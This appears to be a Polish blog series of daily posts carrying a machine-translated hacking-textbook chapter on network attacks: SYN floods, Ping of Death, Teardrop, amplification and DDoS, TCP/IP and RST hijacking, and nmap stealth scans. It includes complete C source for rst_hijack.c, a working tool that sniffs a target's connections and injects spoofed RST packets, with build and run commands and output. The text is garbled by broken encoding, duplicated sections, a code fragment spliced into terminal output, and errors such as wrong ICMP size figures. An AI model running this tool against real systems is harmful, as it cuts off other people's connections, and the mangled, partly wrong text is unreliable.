17:08:16.418494 IP 137.101.201.0.54665 > 192.168.42.88.22: S

1185734766:1185734766(0) win 57243

17:08:16.430497 IP 188.5.248.61.8409 > 192.168.42.88.22: S

1825734966:1825734966(0) win 43454

17:08:16.442911 IP 44.71.67.65.60484 > 192.168.42.88.22: S

1042470133:1042470133(0) win 7087

17:08:16.454489 IP 218.66.249.126.27982 > 192.168.42.88.22: S

1767717206:1767717206(0) win 50156

17:08:16.466493 IP 131.238.172.7.15390 > 192.168.42.88.22: S

2127701542:2127701542(0) win 23682

17:08:16.478497 IP 130.246.104.88.48221 > 192.168.42.88.22: S

2069757602:2069757602(0) win 4767

17:08:16.490908 IP 140.187.48.68.9179 > 192.168.42.88.22: S

1429854465:1429854465(0) win 2092

17:08:16.502498 IP 33.172.101.123.44358 > 192.168.42.88.22: S

1524034954:1524034954(0) win 26970

15 packets captured

30 packets received by filter

0 packets dropped by kernel

reader@hacking:~/booksrc $ ssh -v 192.168.42.88

OpenSSH_4.3p2, OpenSSL 0.9.8c 05 Sep 2006

debug1: Reading configuration data /etc/ssh/ssh_config

debug1: Connecting to 192.168.42.88 [192.168.42.88] port 22.

debug1: connect to address 192.168.42.88 port 22: Connection refused

ssh: connect to host 192.168.42.88 port 22: Connection refused

reader@hacking:~/booksrc $

Niekt�re systemy operacyjne (na przyk�ad Linux) u�ywaj� techniki zwanej syncookies, aby zapobiec atakom typu SYN flood. Stos TCP u�ywaj�cy syncookies dostosowuje pocz�tkowy numer potwierdzenia dla odpowiadaj�cego pakietu SYN / ACK za pomoc� warto�ci opartej na szczeg�ach hosta i czasie (aby zapobiec atakom powt�rki). Po��czenia TCP w rzeczywisto�ci nie staj� si� aktywne, dop�ki nie zostanie sprawdzony ostateczny pakiet ACK dla uzgadniania TCP. Je�li numer sekwencji si� nie zgadza lub ACK nigdy nie nadejdzie, po��czenie nigdy nie zostanie utworzone. Pomaga to zapobiec fa�szywym pr�bom po��cze�, poniewa� pakiet ACK wymaga przes�ania informacji do do adresu �r�d�owego pocz�tkowego pakietu SYN.

Powr�t

19.08.2020

Ping of Death

Zgodnie ze specyfikacj� ICMP, komunikaty echa ICMP mog� mie� tylko 216 lub 65 536 bajt�w danych w cz�ci danych pakietu. Cz�� danych pakiet�w ICMP jest cz�sto pomijana, poniewa� wa�ne informacje znajduj� si� w nag��wku. Kilka system�w operacyjnych uleg�o awarii, je�li wys�ano komunikaty echa ICMP, kt�re przekracza�y okre�lony rozmiar. Komunikat echa ICMP tego gigantycznego rozmiaru zosta� pieszczotliwie nazwany "Ping of Death". By� to bardzo prosty hack wykorzystuj�cy istniej�c� luk�, poniewa� nikt nigdy nie rozwa�a� tej mo�liwo�ci. Powinno by� �atwo napisa� program wykorzystuj�cy libnet, kt�ry mo�e wykona� ten atak; jednak nie b�dzie to przydatne w prawdziwym �wiecie. Nowoczesne systemy s� zabezpieczone przed t� luk�. Historia jednak si� powtarza. Mimo �e zbyt du�e pakiety ICMP nie powoduj� awarii komputer�w, nowe technologie czasami maj� podobne problemy. Protok� Bluetooth, powszechnie u�ywany w telefonach, ma podobny pakiet ping na warstwie L2CAP, kt�ry jest r�wnie� u�ywany do pomiaru czasu komunikacji na ustalonych ��czach. Wiele implementacji Bluetooth cierpi na ten sam zbyt du�y problem z pakietem ping. Adam Laurie, Marcel Holtmann i Martin Herfurt nazwali ten atak Bluesmack i wydali kod �r�d�owy o tej samej nazwie, kt�ry wykonuje ten atak.

Powr�t

20.08.2020

Teardrop

Kolejny atak typu DoS, kt�ry nast�pi� z tego samego powodu, nazywano �z�. Teardrop wykorzysta� kolejn� s�abo�� w implementacjach fragmentacji IP przez kilku dostawc�w. Zwykle, gdy pakiet jest pofragmentowany, przesuni�cia zapisane w nag��wku zostan� wyr�wnane, aby zrekonstruowa� oryginalny pakiet bez nak�adania si�. Atak na �zy wys�a� fragmenty pakiet�w z nak�adaj�cymi si� przesuni�ciami, co spowodowa�o implementacje, kt�re nie sprawdzi�y, czy ten nieregularny stan nieuchronnie ulegnie awarii. Chocia� ten konkretny atak ju� nie dzia�a, zrozumienie poj�cia mo�e ujawni� problemy w innych obszarach. Chocia� nie jest to ograniczone do Denial of Service, niedawny zdalny exploit w j�drze OpenBSD (kt�ry szczyci si� bezpiecze�stwem) mia� do czynienia z pofragmentowanymi pakietami IPv6. Wersja IP 6 u�ywa bardziej skomplikowanych nag��wk�w, a nawet innego formatu adresu IP ni� IPv4, kt�ry wi�kszo�� ludzi zna. Cz�sto pope�niane s� te same b��dy w przesz�o�ci s� powtarzane przez wczesne wdra�anie nowych produkt�w.

Powr�t

21.08.2020

Ping Flooding

Ataki powodziowe DoS nie pr�buj� koniecznie niszczy� us�ugi lub zasobu, ale zamiast tego pr�buj� go przeci��a�, aby nie m�g� odpowiedzie�. Podobne ataki mog� wi�za� inne zasoby, takie jak cykle procesora i procesy systemowe, ale atak powodziowy szczeg�lnie pr�buje powi�za� zas�b sieciowy. Najprostsz� form� powodzi jest po prostu ping pow�d�. Celem jest wykorzystanie przepustowo�ci ofiary, aby legalny ruch nie m�g� si� przedosta�. Atakuj�cy wysy�a wiele du�ych pakiet�w ping do ofiary, kt�re po�eraj� przepustowo�� po��czenia sieciowego ofiary. Nie ma nic m�drego w tym ataku - to tylko walka o przepustowo��. Atakuj�cy o wi�kszej przepustowo�ci ni� ofiara mo�e wysy�a� wi�cej danych, ni� ofiara mo�e otrzyma�, a tym samym uniemo�liwia� innym legalnym ruchom dotarcie do ofiary.

Powr�t

22.08.2020

Ataki wzmacniaj�ce

W rzeczywisto�ci istnieje kilka sprytnych sposob�w na wykonanie powodzi pingowej bez u�ycia ogromnej ilo�ci pasma. Atak wzmacniaj�cy wykorzystuje spoofing i adresowanie rozg�oszeniowe w celu wzmocnienia pojedynczego strumienia pakiet�w stokrotnie. Najpierw nale�y znale�� docelowy system amplifikacji. Jest to sie�, kt�ra umo�liwia komunikacj� z adresem rozg�oszeniowym i ma stosunkowo du�� liczb� aktywnych host�w. Nast�pnie atakuj�cy wysy�a du�e pakiety ��da� echa ICMP do adresu rozg�oszeniowego sieci wzmacniaj�cej, ze sfa�szowanym adresem �r�d�owym systemu ofiary. Wzmacniacz b�dzie transmitowa� te pakiety do wszystkich host�w w sieci wzmacniaj�cej, kt�re nast�pnie wy�l� odpowiednie pakiety odpowiedzi echa ICMP na sfa�szowany adres �r�d�owy (tj. Na maszyn� ofiary). To wzmocnienie ruchu pozwala atakuj�cemu na wys�anie stosunkowo ma�ego strumienia pakiet�w ��da� echa ICMP, podczas gdy ofiara zostaje zalana do kilkuset razy wi�cej pakiet�w odpowiedzi echa ICMP. Atak ten mo�na wykona� zar�wno za pomoc� pakiet�w ICMP, jak i pakiet�w echa UDP. Techniki te znane s� odpowiednio jako ataki smurf i fraggle.

Powr�t

23.08.2020

Pow�d� rozproszona DoS

Atak rozproszony DoS (DDoS) jest rozproszon� wersj� ataku powodziowego DoS. Poniewa� zu�ycie przepustowo�ci jest celem ataku powodziowego DoS, im wi�ksza jest przepustowo��, z jak� atakuj�cy mo�e pracowa�, tym wi�cej szk�d mog� zrobi�. W ataku DDoS atakuj�cy najpierw atakuje wiele innych host�w i instaluje na nich demony. Systemy instalowane z takim oprogramowaniem s� powszechnie nazywane botami i tworz� tzw. Botnet. Te boty cierpliwie czekaj�, a� atakuj�cy wybierze ofiar� i zdecyduje si� na atak. Atakuj�cy u�ywa pewnego rodzaju programu kontroluj�cego, a wszystkie boty atakuj� jednocze�nie ofiar� za pomoc� jakiej� formy ataku DoS. Ogromna liczba rozproszonych host�w nie tylko zwielokrotnia efekt powodzi, ale tak�e znacznie utrudnia �ledzenie �r�d�a ataku.

Powr�t

24.08.2020

Przej�cie TCP / IP

Przej�cie protoko�u TCP / IP to sprytna technika, kt�ra wykorzystuje sfa�szowane pakiety do przej�cia po��czenia mi�dzy ofiar� a komputerem hosta. Ta technika jest wyj�tkowo przydatna, gdy ofiara u�ywa jednorazowego has�a do po��czenia si� z komputerem hosta. Jednorazowe has�o mo�e zosta� u�yte do uwierzytelnienia raz i tylko raz, co oznacza sniffowanie uwierzytelnienia jest bezu�yteczne dla atakuj�cego. Aby przeprowadzi� atak przejmuj�cy TCP / IP, osoba atakuj�ca musi znajdowa� si� w tej samej sieci, co ofiara. Poprzez w�chanie lokalnego segmentu sieci, wszystkie szczeg�y otwartych po��cze� TCP mog� zosta� pobrane z nag��wk�w. Tak jak my widziane, ka�dy pakiet TCP zawiera numer sekwencji w nag��wku. Ten numer sekwencyjny jest zwi�kszany wraz z ka�dym wys�anym pakietem, aby zapewni�, �e pakiety s� odbierane we w�a�ciwej kolejno�ci. Podczas w�chania atakuj�cy ma dost�p do numer�w sekwencji dla po��czenia mi�dzy ofiar� (system A na poni�szej ilustracji) a hostem maszyna (system B). Nast�pnie atakuj�cy wysy�a sfa�szowany pakiet z adresu IP ofiary do komputera hosta, u�ywaj�c podanego numeru sekwencyjnego, aby poda� prawid�owy numer potwierdzenia.Komputer hosta otrzyma sfa�szowany pakiet z poprawnym numerem potwierdzenia i nie b�dzie mia� powodu s�dzi�, �e nie pochodzi z maszyny ofiary.

Powr�t

25.08.2020

TCP / IP Hijacking

Przej�cie protoko�u TCP / IP to sprytna technika, kt�ra wykorzystuje sfa�szowane pakiety do przej�cia po��czenia mi�dzy ofiar� a komputerem hosta. Ta technika jest wyj�tkowo przydatna, gdy ofiara u�ywa jednorazowego has�a do po��czenia si� z komputerem hosta. Jednorazowe has�o mo�e by� u�yte do uwierzytelnienia raz i tylko raz, co oznacza, �e wykrywanie uwierzytelnienia jest bezu�yteczne dla atakuj�cego. Aby przeprowadzi� atak przejmuj�cy TCP / IP, osoba atakuj�ca musi znajdowa� si� w tej samej sieci, co ofiara. Poprzez w�chanie lokalnego segmentu sieci, wszystkie szczeg�y otwartych po��cze� TCP mog� zosta� pobrane z nag��wk�w. Tak jak my widzimy, ka�dy pakiet TCP zawiera numer sekwencji w nag��wku. Ten numer sekwencyjny jest zwi�kszany wraz z ka�dym wys�anym pakietem, aby zapewni�, �e pakiety s� odbierane we w�a�ciwej kolejno�ci. Podczas w�chania atakuj�cy ma dost�p do numer�w sekwencji dla po��czenia mi�dzy ofiar� (system A na poni�szej ilustracji) a komputerem g��wnym (system B). Nast�pnie atakuj�cy wysy�a sfa�szowany pakiet z adresu IP ofiary do komputera hosta, u�ywaj�c podanego numeru sekwencyjnego, aby poda� prawid�owy numer potwierdzenia. Komputer hosta otrzyma sfa�szowany pakiet z poprawnym numerem potwierdzenia i nie b�dzie mia� powodu s�dzi�, �e nie pochodzi z maszyny ofiary.

Powr�t

26.08.2020

RST Hijacking

Bardzo prosta forma przej�cia TCP / IP polega na wstrzykni�ciu autentycznie wygl�daj�cego pakietu resetowania (RST). Je�li �r�d�o jest sfa�szowane, a numer potwierdzenia jest poprawny, strona otrzymuj�ca uzna, �e �r�d�o faktycznie wys�a�o pakiet resetowania, a po��czenie zostanie zresetowane. Wyobra� sobie program do wykonania tego ataku na docelowy adres IP. Na wysokim poziomie, sniff za pomoc� libpcap, a nast�pnie wstrzykiwa� pakiety RST przy u�yciu libnet. Taki program nie musi patrze� na ka�dy pakiet, ale tylko na ustalone po��czenia TCP z docelowym adresem IP. Wiele innych program�w, kt�re u�ywaj� libpcap, r�wnie� nie musi patrze� na ka�dy pojedynczy pakiet, wi�c libpcap zapewnia spos�b, aby powiedzie� j�dru, aby wysy�a�o tylko niekt�re pakiety, kt�re pasuj� do filtra. Ten filtr, znany jako filtr pakiet�w Berkeley (BPF), jest bardzo podobny do programu. Na przyk�ad regu�a filtrowania do filtrowania docelowego adresu IP 192.168.42.88 to "host dst 192.168.42.88". Podobnie jak program, ta regu�a sk�ada si� ze s�owa kluczowego i musi zosta� skompilowana zanim zostanie wys�ana do j�dra. Program tcpdump u�ywa BPF do filtrowania tego, co przechwytuje; zapewnia r�wnie� tryb zrzucania programu filtruj�cego.

RST Hijacking

Bardzo prosta forma przej�cia TCP / IP polega na wstrzykni�ciu autentycznie wygl�daj�cego pakietu resetowania (RST). Je�li �r�d�o jest sfa�szowane, a numer potwierdzenia jest poprawny, strona otrzymuj�ca uzna, �e �r�d�o faktycznie wys�a�o pakiet resetowania, a po��czenie zostanie zresetowane. Wyobra� sobie program do wykonania tego ataku na docelowy adres IP. Na wysokim poziomie, sniff za pomoc� libpcap, a nast�pnie wstrzykiwa� pakiety RST przy u�yciu libnet. Taki program nie musi patrze� na ka�dy pakiet, ale tylko na ustalone po��czenia TCP z docelowym adresem IP. Wiele innych program�w, kt�re u�ywaj� libpcap, r�wnie� nie musi patrze� na ka�dy pojedynczy pakiet, wi�c libpcap zapewnia spos�b, aby powiedzie� j�dru, aby wysy�a�o tylko niekt�re pakiety, kt�re pasuj� do filtra. Ten filtr, znany jako filtr pakiet�w Berkeley (BPF), jest bardzo podobny do programu. Na przyk�ad regu�a filtrowania do filtrowania docelowego adresu IP 192.168.42.88 to "host dst 192.168.42.88". Podobnie jak program, ta regu�a sk�ada si� ze s�owa kluczowego i musi zosta� skompilowana zanim zostanie wys�ana do j�dra. Program tcpdump u�ywa BPF do filtrowania tego, co przechwytuje; zapewnia r�wnie� tryb zrzucania programu filtruj�cego.

reader@hacking:~/booksrc $ sudo tcpdump -d "dst host 192.168.42.88"

(000) ldh [12]

(001) jeq #0x800 jt 2 jf 4

(002) ld [30]

(003) jeq #0xc0a82a58 jt 8 jf 9

(004) jeq #0x806 jt 6 jf 5

(005) jeq #0x8035 jt 6 jf 9

(006) ld [38]

(007) jeq #0xc0a82a58 jt 8 jf 9

(008) ret #96

(009) ret #0

reader@hacking:~/booksrc $ sudo tcpdump -ddd "dst host 192.168.42.88"

10

40 0 0 12

21 0 2 2048

32 0 0 30

21 4 5 3232246360

21 1 0 2054

21 0 3 32821

32 0 0 38

21 0 1 3232246360

6 0 0 96

6 0 0 0

reader@hacking:~/booksrc $

Po skompilowaniu regu�y filtrowania mo�na j� przekaza� do j�dra w celu filtrowania. Filtrowanie ustalonych po��cze� jest nieco bardziej skomplikowane. Wszystkie ustanowione po��czenia b�d� mia�y ustawion� flag� ACK, wi�c tego w�a�nie powinni�my szuka�. Flagi TCP znajduj� si� w 13-tym oktecie nag��wka TCP. Flagi znajduj� si� w nast�puj�cej kolejno�ci, od lewej do prawej: URG, ACK, PSH, RST, SYN i FIN. Oznacza to, �e je�li flaga ACK jest w��czona, 13-ty oktet mia�by warto�� 00010000 w postaci binarnej, czyli 16 w postaci dziesi�tnej. Je�li w��czone s� zar�wno SYN, jak i ACK, 13-ty oktet b�dzie mia� warto�� 00010010 w postaci binarnej, czyli 18 w postaci dziesi�tnej. Aby utworzy� filtr pasuj�cy do w��czonej flagi ACK bez dbania o �aden z pozosta�ych bit�w, u�ywany jest operator bitowy AND. Wywo�anie 00010010 za pomoc� 00010000 spowoduje wygenerowanie 00010000, poniewa� bit ACK jest jedynym bitem, w kt�rym oba bity wynosz� 1. Oznacza to, �e filtr tcp [13] i 16 == 16 b�dzie pasowa� do pakiet�w, w kt�rych flaga ACK jest w��czona, niezale�nie stanu pozosta�ych flag. Ta regu�a filtrowania mo�e zosta� przepisana przy u�yciu nazwanych warto�ci i odwr�conej logiki jako tcp [tcpflags] & tcp-ack! = 0. Jest to �atwiejsze do odczytania, ale nadal zapewnia ten sam wynik. Ta regu�a mo�e by� ��czona z poprzedni� docelow� regu�� IP i logik�; pe�na zasada jest pokazana poni�ej.

reader@hacking:~/booksrc $ sudo tcpdump -nl "tcp[tcpflags] & tcp-ack != 0 and dst host

192.168.42.88"

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

10:19:47.567378 IP 192.168.42.72.40238 > 192.168.42.88.22: . ack 2777534975 win 92

10:19:47.770276 IP 192.168.42.72.40238 > 192.168.42.88.22: . ack 22 win 92 < nop,nop,

timestamp

85838621 29399>

if (target_ip == -1)

fatal("Invalid target address");

device = pcap_lookupdev(errbuf);

if(device == NULL)

fatal(errbuf);

pcap_handle = pcap_open_live(device, 128, 1, 0, errbuf);

if(pcap_handle == NULL)

reader@hacking:~/booksrc $ sudo tcpdump -d "dst host 192.168.42.88"

(000) ldh [12]

(001) jeq #0x800 jt 2 jf 4

(002) ld [30]

(003) jeq #0xc0a82a58 jt 8 jf 9

(004) jeq #0x806 jt 6 jf 5

(005) jeq #0x8035 jt 6 jf 9

(006) ld [38]

(007) jeq #0xc0a82a58 jt 8 jf 9

(008) ret #96

(009) ret #0

reader@hacking:~/booksrc $ sudo tcpdump -ddd "dst host 192.168.42.88"

10

40 0 0 12

21 0 2 2048

32 0 0 30

21 4 5 3232246360

21 1 0 2054

21 0 3 32821

32 0 0 38

21 0 1 3232246360

6 0 0 96

6 0 0 0

reader@hacking:~/booksrc $

Po skompilowaniu regu�y filtrowania mo�na j� przekaza� do j�dra w celu filtrowania. Filtrowanie ustalonych po��cze� jest nieco bardziej skomplikowane. Wszystkie ustanowione po��czenia b�d� mia�y ustawion� flag� ACK, wi�c tego w�a�nie powinni�my szuka�. Flagi TCP znajduj� si� w 13-tym oktecie nag��wka TCP. Flagi znajduj� si� w nast�puj�cej kolejno�ci, od lewej do prawej: URG, ACK, PSH, RST, SYN i FIN. Oznacza to, �e je�li flaga ACK jest w��czona, 13-ty oktet mia�by warto�� 00010000 w postaci binarnej, czyli 16 w postaci dziesi�tnej. Je�li w��czone s� zar�wno SYN, jak i ACK, 13-ty oktet b�dzie mia� warto�� 00010010 w postaci binarnej, czyli 18 w postaci dziesi�tnej. Aby utworzy� filtr pasuj�cy do w��czonej flagi ACK bez dbania o �aden z pozosta�ych bit�w, u�ywany jest operator bitowy AND. Wywo�anie 00010010 za pomoc� 00010000 spowoduje wygenerowanie 00010000, poniewa� bit ACK jest jedynym bitem, w kt�rym oba bity wynosz� 1. Oznacza to, �e filtr tcp [13] i 16 == 16 b�dzie pasowa� do pakiet�w, w kt�rych flaga ACK jest w��czona, niezale�nie stanu pozosta�ych flag. Ta regu�a filtrowania mo�e zosta� przepisana przy u�yciu nazwanych warto�ci i odwr�conej logiki jako tcp [tcpflags] & tcp-ack! = 0. Jest to �atwiejsze do odczytania, ale nadal zapewnia ten sam wynik. Ta regu�a mo�e by� ��czona z poprzedni� docelow� regu�� IP i logik�; pe�na zasada jest pokazana poni�ej.

reader@hacking:~/booksrc $ sudo tcpdump -nl "tcp[tcpflags] & tcp-ack != 0 and dst host

192.168.42.88"

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

10:19:47.567378 IP 192.168.42.72.40238 > 192.168.42.88.22: . ack 2777534975 win 92

< nop,nop,timestamp 85838571 0>

10:19:47.770276 IP 192.168.42.72.40238 > 192.168.42.88.22: . ack 22 win 92 < nop,nop,

timestamp

85838621 29399>

10:19:47.770322 IP 192.168.42.72.40238 > 192.168.42.88.22: P 0:20(20) ack 22 win 92

< nop,nop,timestamp 85838621 29399>

10:19:47.771536 IP 192.168.42.72.40238 > 192.168.42.88.22: P 20:732(712) ack 766 win 115

< nop,nop,timestamp 85838622 29399>

10:19:47.918866 IP 192.168.42.72.40238 > 192.168.42.88.22: P 732:756(24) ack 766 win 115

< nop,nop,timestamp 85838659 29402>

Podobna regu�a jest u�ywana w nast�puj�cym programie do filtrowania pakiet�w, kt�re libpcap sniffuje. Gdy program otrzymuje pakiet, informacje nag��wka s� u�ywane do sfa�szowania pakietu RST. Ten program zostanie wyja�niony na li�cie.

rst_hijack.c

#include < libnet.h >

#include < pcap.h >

#include "hacking.h"

void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);

int set_packet_filter(pcap_t *, struct in_addr *);

struct data_pass {

int libnet_handle;

u_char *packet;

};

int main(int argc, char *argv[]) {

struct pcap_pkthdr cap_header;

const u_char *packet, *pkt_data;

pcap_t *pcap_handle;

char errbuf[PCAP_ERRBUF_SIZE]; // Same size as LIBNET_ERRBUF_SIZE

char *device;

u_long target_ip;

int network;

struct data_pass critical_libnet_data;

if(argc < 1) {

printf("Usage: %s \n", argv[0]);

exit(0);

}

target_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE);

if (target_ip == -1)

fatal("Invalid target address");

device = pcap_lookupdev(errbuf);

if(device == NULL)

fatal(errbuf);

pcap_handle = pcap_open_live(device, 128, 1, 0, errbuf);

if(pcap_handle == NULL)

fatal(errbuf);

critical_libnet_data.libnet_handle = libnet_open_raw_sock(IPPROTO_RAW);

if(critical_libnet_data.libnet_handle == -1)

libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must

run

as root.\n");

libnet_init_packet(LIBNET_IP_H + LIBNET_TCP_H, &(critical_libnet_data.packet));

if (critical_libnet_data.packet == NULL)

libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n");

libnet_seed_prand();

set_packet_filter(pcap_handle, (struct in_addr *)&target_ip);

printf("Resetting all TCP connections to %s on %s\n", argv[1], device);

pcap_loop(pcap_handle, -1, caught_packet, (u_char *)&critical_libnet_data);

pcap_close(pcap_handle);

}

Wi�kszo�� tego programu powinna mie� dla ciebie sens. Na pocz�tku zdefiniowana jest struktura data_pass, kt�ra s�u�y do przekazywania danych przez wywo�anie zwrotne libpcap. libnet jest u�ywany do otwierania interfejsu surowego gniazda i przydzielania pami�ci pakiet�w. Deskryptor pliku dla surowego gniazda i wska�nik do pami�ci pakietu b�d� potrzebne w funkcji wywo�ania zwrotnego, wi�c te krytyczne dane libnet s� przechowywane we w�asnej strukturze. Ostatnim argumentem wywo�ania pcap_loop () jest wska�nik u�ytkownika, kt�ry jest przekazywany bezpo�rednio do funkcji wywo�ania zwrotnego. Przekazuj�c wska�nik do struktury critical_libnet_data, funkcja wywo�ania zwrotnego b�dzie mia�a dost�p do wszystkiego w tej strukturze. Ponadto warto�� d�ugo�ci przyci�gania u�yta w pcap_open_live () zosta�a zmniejszona z 4096 do 128, poniewa� informacje potrzebne z pakietu s� tylko w nag��wkach.

/* Sets a packet filter to look for established TCP connections to target_ip */

int set_packet_filter(pcap_t *pcap_hdl, struct in_addr *target_ip) {

struct bpf_program filter;

char filter_string[100];

sprintf(filter_string, "tcp[tcpflags] & tcp-ack != 0 and dst host %s",

inet_ntoa(*target_ip));

printf("DEBUG: filter string is \'%s\'\n", filter_string);

if(pcap_compile(pcap_hdl, &filter, filter_string, 0, 0) == -1)

fatal("pcap_compile failed");

if(pcap_setfilter(pcap_hdl, &filter) == -1)

fatal("pcap_setfilter failed");

}

Nast�pna funkcja kompiluje i ustawia BPF, aby akceptowa� tylko pakiety z ustalonych po��cze� do docelowego IP. Funkcja sprintf () jest po prostu printf (), kt�ra drukuje na �a�cuch.

void caught_packet(u_char *user_args, const struct pcap_pkthdr *cap_header, const u_char

*packet) {

u_char *pkt_data;

struct libnet_ip_hdr *IPhdr;

struct libnet_tcp_hdr *TCPhdr;

struct data_pass *passed;

int bcount;

passed = (struct data_pass *) user_args; // Pass data using a pointer to a struct.

IPhdr = (struct libnet_ip_hdr *) (packet + LIBNET_ETH_H);

TCPhdr = (struct libnet_tcp_hdr *) (packet + LIBNET_ETH_H + LIBNET_TCP_H);

printf("resetting TCP connection from %s:%d ",

inet_ntoa(IPhdr->ip_src), htons(TCPhdr->th_sport));

printf("<---> %s:%d\n",

inet_ntoa(IPhdr->ip_dst), htons(TCPhdr->th_dport));

libnet_build_ip(LIBNET_TCP_H, // Size of the packet sans IP header

IPTOS_LOWDELAY, // IP tos

libnet_get_prand(LIBNET_PRu16), // IP ID (randomized)

0, // Frag stuff

libnet_get_prand(LIBNET_PR8), // TTL (randomized)

IPPROTO_TCP, // Transport protocol

*((u_long *)&(IPhdr->ip_dst)), // Source IP (pretend we are dst)

*((u_long *)&(IPhdr->ip_src)), // Destination IP (send back to src)

NULL, // Payload (none)

0, // Payload length

passed->packet); // Packet header memory

libnet_build_tcp(htons(TCPhdr->th_dport), // Source TCP port (pretend we are dst)

htons(TCPhdr->th_sport), // Destination TCP port (send back to src)

htonl(TCPhdr->th_ack), // Sequence number (use previous ack)

libnet_get_prand(LIBNET_PRu32), // Acknowledgement number (randomized)

TH_RST, // Control flags (RST flag set only)

libnet_get_prand(LIBNET_PRu16), // Window size (randomized)

0, // Urgent pointer

NULL, // Payload (none)

0, // Payload length

(passed->packet) + LIBNET_IP_H);// Packet header memory

if (libnet_do_checksum(passed->packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)

libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");

bcount = libnet_write_ip(passed->libnet_handle, passed->packet,

LIBNET_IP_H+LIBNET_TCP_H);

if (bcount < LIBNET_IP_H + LIBNET_TCP_H)

libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written.");

usleep(5000); // pause slightly

}

Funkcja zwrotna fa�szuje pakiety RST. Najpierw pobierane s� krytyczne dane libnet, a wska�niki do nag��wk�w IP i TCP s� ustawiane przy u�yciu struktur do��czonych do libnet. Mogliby�my u�y� w�asnych struktur z hacking-network.h, ale struktury libnet ju� tam s� i kompensuj� kolejno�� bajt�w hosta. Sfa�szowany pakiet RST u�ywa pods�uchiwanego adresu �r�d�owego jako miejsca docelowego i odwrotnie. Wci�gni�ty numer sekwencyjny jest u�ywany jako numer potwierdzenia fa�szywego pakietu, poniewa� tego si� oczekuje.

reader@hacking:~/booksrc $ gcc $(libnet-config --defines) -o rst_hijack rst_hijack.c -lnet

-lpcap

reader@hacking:~/booksrc $ sudo ./rst_hijack 192.168.42.88

DEBUG: filter string is 'tcp[tcpflags] & tcp-ack != 0 and dst host 192.168.42.88'

Resetting all TCP connections to 192.168.42.88 on eth0

resetting TCP connection from 192.168.42.72:47783 <---> 192.168.42.88:22

Powr�t

27.08.2020

Skanowanie port�w

Skanowanie port�w to spos�b na okre�lenie, kt�re porty nas�uchuj� i akceptuj� po��czenia. Poniewa� wi�kszo�� us�ug dzia�a na standardowych, udokumentowanych portach, informacje te mo�na wykorzysta� do okre�lenia, kt�re us�ugi s� uruchomione. Najprostsza forma skanowania port�w polega na pr�bie otwarcia po��cze� TCP do ka�dego mo�liwego portu docelowego systemu. Chocia� jest to skuteczne, jest r�wnie� g�o�ne i wykrywalne. Ponadto, gdy po��czenia zostan� ustanowione, us�ugi zwykle loguj� adres IP. Aby tego unikn��, wymy�lono kilka sprytnych technik. Narz�dzie do skanowania port�w o nazwie nmap, napisane przez Fiodora, implementuje wszystkie nast�puj�ce techniki skanowania port�w. To narz�dzie sta�o si� jednym z najpopularniejszych narz�dzi skanuj�cych port open source

Powr�t

28.08.2020

Stealth SYN Scan

Skanowanie SYN jest czasami nazywane skanowaniem p�otwartym. Dzieje si� tak, poniewa� w rzeczywisto�ci nie otwiera pe�nego po��czenia TCP. Przywo�aj u�cisk d�oni TCP / IP: Po nawi�zaniu pe�nego po��czenia najpierw wysy�any jest pakiet SYN, a nast�pnie odsy�any jest pakiet SYN / ACK, a na koniec zwracany jest pakiet ACK w celu doko�czenia uzgadniania i otwarcia po��czenia. Skanowanie SYN nie ko�czy uzgadniania, wi�c pe�ne po��czenie nigdy nie jest otwierane. Zamiast tego wysy�any jest tylko pocz�tkowy pakiet SYN, a odpowied� jest sprawdzana. Je�li pakiet SYN / ACK zostanie odebrany w odpowiedzi, port ten musi akceptowa� po��czenia. Jest to rejestrowane i wysy�any jest pakiet RST w celu zerwania po��czenia uniemo�liwi� przypadkowe wykonanie us�ugi. U�ywaj�c nmap, mo�na wykona� skanowanie SYN za pomoc� opcji wiersza polecenia -sS. Program musi by� uruchamiany jako root, poniewa� program nie u�ywa standardowych gniazd i wymaga dost�pu do surowej sieci.

reading @ hacking: ~ / booksrc $ sudo nmap -sS 192.168.42.72

Rozpocz�cie Nmap 4.20 (http://insecure.org) 2007-05-29 09:19 PDT

Interesuj�ce porty 192.168.42.72:

Nie pokazano: 1696 zamkni�tych port�w

SERWIS PORTOWY

22 / tcp open ssh

Zako�czono Nmap: 1 adres IP (1 host w g�r�) zeskanowany w ci�gu 0,094 sekundy

Powr�t

29.08.2020

FIN, X-mas i Null Scans

W odpowiedzi na skanowanie SYN utworzono nowe narz�dzia do wykrywania i rejestrowania p�otwartych po��cze�. Tak wi�c ewoluowa� kolejny zbi�r technik skanowania port�w stealth: FIN, X-mas i skany Null. Wszystkie one obejmuj� wysy�anie bezsensownego pakietu do ka�dego portu w systemie docelowym. Je�li port nas�uchuje, pakiety te s� ignorowane. Je�li jednak port jest zamkni�ty, a implementacja nast�puje zgodnie z protoko�em (RFC 793), zostanie wys�any pakiet RST. Ta r�nica mo�e by� wykorzystana do wykrycia, kt�re porty akceptuj� po��czenia, bez faktycznego otwierania jakichkolwiek po��cze�. Skanowanie FIN wysy�a pakiet FIN, skanowanie X-mas wysy�a pakiet z w��czonymi FIN, URG i PUSH (tak nazwane, poniewa� flagi s� pod�wietlone jak choinka), a skanowanie Null wysy�a pakiet bez TCP zestaw flag. Podczas gdy te rodzaje skanowania s� bardziej ukryte, mog� by� r�wnie� niewiarygodne. Na przyk�ad implementacja protoko�u TCP przez Microsoft nie wysy�a pakiet�w RST tak, jak powinien, czyni�c t� form� skanowania nieskuteczn�. U�ycie nmap, FIN, X-mas i NULL skan�w mo�na wykona� przy u�yciu opcji wiersza polece� odpowiednio -sF, -sX i - sN. Ich wyj�cie wygl�da zasadniczo tak samo jak poprzednie skanowanie

Powr�t

30.08.2020

Wabiki fa�szuj�ce

